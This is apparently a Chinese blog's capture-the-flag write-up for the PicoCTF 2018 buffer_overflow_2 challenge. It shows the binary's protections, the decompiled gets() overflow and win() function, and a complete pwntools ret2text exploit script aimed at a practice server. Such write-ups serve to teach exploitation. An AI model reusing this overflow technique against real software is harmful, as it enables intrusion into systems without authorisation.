加载头像

PicoCTF_2018_buffer_overflow_2

Ubuntu 18 来源:https://github.com/hebtuerror404


0x01


checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/PicoCTF_2018_buffer_overflow_2/PicoCTF_2018_buffer_overflow_2'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

IDA

vuln()

1
2
3
4
5
6
7
int vuln()
{
char s[108]; // [esp+Ch] [ebp-6Ch] BYREF

gets(s); //栈溢出漏洞
return puts(s);
}

可疑函数win()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
char *__cdecl win(int a1, int a2)
{
char *result; // eax
char s[64]; // [esp+Ch] [ebp-4Ch] BYREF
FILE *stream; // [esp+4Ch] [ebp-Ch]

stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(0);
}
result = fgets(s, 64, stream);
if ( a1 == -559038737 && a2 == -559038242 ) //需要满足这两个参数
result = (char *)printf(s);
return result;
}

0x02


思路 re2text

0x03


exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

context(os='linux', arch='i386', log_level='debug')
io = remote('node4.buuoj.cn', 25528)
path = './PicoCTF_2018_buffer_overflow_2'
# io = process([path])

padding = 0x6c + 0x4
win = 0x80485CB
a1 = 0xdeadbeef
a2 = 0xDEADC0DE
payload = flat(b'a'*padding, win, b'a'*4, a1, a2)
io.sendline(payload)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體